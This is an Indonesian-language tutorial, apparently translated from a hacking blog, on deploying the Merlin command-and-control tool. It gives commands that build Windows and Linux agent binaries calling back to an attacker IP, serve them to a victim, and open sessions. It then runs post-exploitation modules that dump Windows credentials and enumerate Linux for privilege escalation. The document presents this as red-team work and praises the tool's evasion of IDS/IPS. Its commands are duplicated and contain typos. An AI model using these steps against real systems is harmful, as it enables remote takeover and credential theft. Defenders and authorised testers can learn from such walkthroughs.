Panduan Perintah dan Kontrol untuk Merlin

Panduan Perintah dan Kontrol untuk Merlin – Merlin adalah alat Komando dan kontrol lintas-platform yang hebat yang ditulis dalam bahasa Go. Itu terbuat dari dua elemen yaitu server dan agen. Ini bekerja pada protokol HTTP / 2. Hal terbaik tentang Merlin adalah bahwa ia dikompilasi untuk bekerja pada platform apa pun dan bahwa Anda bahkan dapat membangunnya dari sumber. Biasanya, agen diletakkan di windows dan didengarkan di Linux tetapi karena ditulis dalam bahasa Go, Merlin memungkinkan kami menempatkan agen di platform / mesin apa pun yang kami temui dan kami dapat mendengarkannya juga di platform apa pun. Ini jauh lebih sukses daripada yang lain ketika datang ke tim merah karena IDS / IPS berjuang untuk mengidentifikasi itu.

Server Merlin akan dijalankan di folder tempat agen dapat memanggilnya. Secara default, server dikonfigurasi pada 127.0.0.1:443 tetapi Anda dapat mengubahnya ke IP Anda sendiri. Agen merlin dapat, seperti dibahas sebelumnya, rumit untuk dijalankan pada platform apa pun. Agen berinteraksi menggunakan server Merlin. File biner dijalankan dengan variabel path target.

Instalasi
Instalasi Merlin cukup rumit. Cara mengunduh yang paling nyaman ditunjukkan dalam artikel ini. Memasang bahasa Go adalah wajib agar Merlin berfungsi. Jadi, untuk menginstal jenis bahasa Go:

apt install golang
apt install golang
Dan kemudian menginstal merlin perintah berikut:

mkdir /opt/merlin;cd /opt/merlin
wget //github.com/Ne0nd0g/merlin/releases/download/v0.1.4/merlinServer-Linux-x64-v0.1.4.7z
mkdir /opt/merlin;cd /opt/merlin
wget //github.com/Ne0nd0g/merlin/releases/download/v0.1.4/merlinServer-Linux-x64-v0.1.4.7z

Setelah perintah di atas berhasil dijalankan, gunakan perintah berikut untuk unzip merlin server.

7z x merlinServer-Linux-x64-v0.1.4.7z
1
7z x merlinServer-Linux-x64-v0.1.4.7z

Sekarang, setelah membuka ritsleting, ketika Anda menggunakan perintah ls; Anda akan menemukan server merlin dan file readme. Kami dapat memeriksa apakah server berjalan dengan menggunakan perintah berikut:

./merlinServer-Linux-x64
./merlinServer-Linux-x64

Dalam “README.MD”, kami menemukan instruksi untuk menginstal “Merlin” di sistem kami.

Sekarang sesuai dengan file readme, kita harus mengatur variabel lingkungan GOPATH untuk instalasi dan kemudian menginstal merlin menggunakan “go” bukan git clone. Jadi, untuk menyelesaikan langkah-langkah ini jalankan serangkaian perintah berikut:

echo “export GOPATH=$HOME/go” >> .bashrc
source .bashrc
go get github.com/Ne0nD0g/merlin
echo “export GOPATH=$HOME/go” >> .bashrc
source .bashrc
go get github.com/Ne0nD0g/merlin
Setelah direktori diunduh, mari kita periksa isinya menggunakan perintah cd dan ls.

Ada direktori cmd, dan di dalamnya, ada direktori bernama merlinserver tempat kami menemukan main.go. Jalankan main.go seperti yang ditunjukkan pada gambar di bawah ini:

go run main.go
1
go run main.go

Seperti yang Anda lihat alat merlin masih tidak berjalan dengan baik karena tidak ada sertifikat SSL yang diberikan kepadanya. Jika Anda menavigasi direktori / opt / merlin, Anda akan menemukan direktori yang bernama data di mana terdapat sertifikat SSL. Salin folder data ke direktori merlinserver seperti yang ditunjukkan pada gambar di bawah ini:

Sekarang jika Anda menjalankan merlin menggunakan perintah: go run main.go , server merlin akan berjalan dengan sukses.

Sekarang menggunakan perintah bantuan berikut yang dapat Anda lihat, seperti yang ditunjukkan pada gambar, argumen yang dapat Anda gunakan untuk menjalankan perintah Anda seperti yang diinginkan:

go run main.go -h
go run main.go -h

Eksploitasi Windows
Sekarang, untuk membuat agen Merlin untuk windows ketik perintah berikut:

GOOS=windows GOARCH=amd64 go build -ldlags “-X main.url=//192.168.0.11:443” -o shell.exe main.go

GOOS=windows GOARCH=amd64 go build -ldlags “-X main.url=//192.168.0.11:443” -o shell.exe main.go
Sekarang, bagikan shell dengan target menggunakan server python:

python -m SimpleHTTPServer 80

python -m SimpleHTTPServer 80

Untuk membuat pendengar agar shell kembali, gunakan perintah berikut:

go run main.go -i 192.168.0.11

go run main.go -i 192.168.0.11

Dan seperti itu, Anda akan memiliki sesi Anda seperti yang ditunjukkan pada gambar di atas. Sekarang, gunakan perintah bantuan untuk melihat semua opsi seperti yang ditunjukkan pada gambar di bawah ini:

Ketik sesi untuk melihat daftar sesi yang Anda peroleh seperti yang ditunjukkan pada gambar di bawah ini:

Untuk mengakses daripada sesi yang tersedia, gunakan perintah berikut:

interact <session name>

interact <session name>

Saat Anda telah mengakses sesi, di sini Anda dapat menggunakan perintah windows seperti:

shell ipconfig

shell ipconfig

Kemudian selanjutnya Anda dapat menggunakan berbagai modul eksploitasi pos, daftar yang ditunjukkan pada gambar di bawah ini:

Eksploitasi pasca Windows
Kami akan menggunakan modul di sini untuk membuang kredensial windows dan untuk mengaktifkan jenis modul pasca eksploitasi tersebut:

use module windows/x64/powershell/credentials/dumpCredStore
use module windows/x64/powershell/credentials/dumpCredStore

Seperti yang Anda lihat pada gambar di atas bahwa perintah info memberi kita semua detail tentang modul termasuk opsi yang perlu kita tentukan dalam modul. Jadi, oleh karena itu, mari kita tentukan opsi:

set agent <agent name>
run
set agent <agent name>
run

Eksploitasi Linux
Sekarang, kami akan membuat agen merlin untuk mesin Linux. Untuk ini, cukup ketik perintah berikut:

Export GOOS=linux;export GOARCH=amd64; go build -ldflags “-s -w -X main.url=//192.168.0.11:443” -o shell.elf main.go
Export GOOS=linux;export GOARCH=amd64; go build -ldflags “-s -w -X main.url=//192.168.0.11:443” -o shell.elf main.go
Setelah perintah dieksekusi, malware Anda akan dibuat. Gunakan python untuk berbagi file dengan korban seperti yang ditunjukkan pada gambar di bawah ini atau melihatnya cocok. Untuk memulai server HTTP python:

python -m SimpleHTTPServer 80
python -m SimpleHTTPServer 80

Atur pendengar dan tunggu file dieksekusi.

go run main.go -I 192.168.0.11
go run main.go -I 192.168.0.11

Dan seperti yang ditunjukkan pada gambar di atas, Anda akan memiliki sesi Anda. Kemudian ketik sesi untuk melihat daftar sesi yang didapat.

Kemudian untuk mengakses sesi gunakan perintah berikut:

interact <session name>

interact <session name>

Selanjutnya, Anda dapat menggunakan perintah Linux seperti:

shell ls
shell ls

Linux pasca eksploitasi
Bahkan di Linux, Anda dapat lebih lanjut menggunakan sejumlah modul pasca-eksploitasi. Yang akan kita gunakan dalam artikel ini adalah privesc / LinEnum:

use module linux/x64/bash/priesc/LinEnum
use module linux/x64/bash/priesc/LinEnum

Melalui perintah info, kita tahu bahwa kita harus memberikan sesi untuk menjalankan modul ini. Jadi, ketik:

set agent <session name>
run
set agent <session name>
run

Dan dengan cara ini modul Anda akan berjalan. Cobalah dan bekerja dengan alat Merlin c2 sebagai salah satu yang terbaik dan karena Anda dapat melihat betapa nyamannya crossed-platformed.

Penulis: Sayantan Bera adalah seorang penulis teknis di peretasan artikel dan penggila keamanan siber . Hubungi di sini